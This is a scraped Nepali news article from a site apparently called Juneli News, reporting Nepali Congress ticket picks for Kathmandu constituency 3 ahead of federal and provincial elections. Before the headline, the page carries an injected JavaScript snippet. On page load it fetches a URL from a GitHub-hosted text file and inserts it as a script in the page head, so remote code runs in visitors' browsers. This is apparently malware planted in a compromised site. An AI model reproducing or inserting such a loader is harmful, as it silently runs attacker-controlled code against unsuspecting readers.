;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौं क्षेत्र नं ३ मा सन्तोष चालिसे र प्रदेश ‘क’ मा छिरिङ दोर्जे लामा फाइनल – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाडौं क्षेत्र नं ३ मा सन्तोष चालिसे र प्रदेश ‘क’ मा छिरिङ दोर्जे लामा फाइनल
Breaking News

काठमाडौं क्षेत्र नं ३ मा सन्तोष चालिसे र प्रदेश ‘क’ मा छिरिङ दोर्जे लामा फाइनल

जुनेली न्यून, काठमाडौँ।

काठमाडौं क्षेत्र नं ३ मा नेपाली कांग्रेसबाट सन्तोष चालिसेले टिकेटको पाउन सफल भएका छन् भने क्षेत्र नं ३ प्रदेश क मा भने छिरिङ दोर्जे लामाले टिकेटको पाएका छन्। टिकेटको अन्तिम लिस्ट आउने बित्तिकै नेपाली कांग्रेस काठमाडौँ क्षेत्र नं ३ का सचिव दिपक रिसालले बताउनु भयो।

सन्तोष चालिसे काँग्रेसका सोही क्षेत्रका क्षेत्रीय सभापति समेत रहेका छन् । उनले अघिल्लो स्थानीय चुनावमा गोकर्णेश्वर नगरपालिकाको मेयर पनि चलाई सकेका छन।

छिरिङ दोर्जे लामा अघिल्लो कार्यकाल पनि सोही प्रदेशबाट सांसद् बनेर एक कार्यकाल चालाएका छन् ।

आउँदो मंसिर ४ गतेको संघीय र प्रदेशको चुनावको लागि देश भरी टिकेटको लहर चली रहेको छ। नेताहरु दशैंको माहोलमा भन्दा पनि टिकेटको माहोलमा बढी हुम्मिएका छन्। गठबन्धनको बाँडफाँटको चाटारोमा रहेका पार्टीले पनि आफ्नो उम्मेदवार लगभग टुङगोमा ल्याइसकेका छन्।

फेसबुक प्रतिक्रियाहरु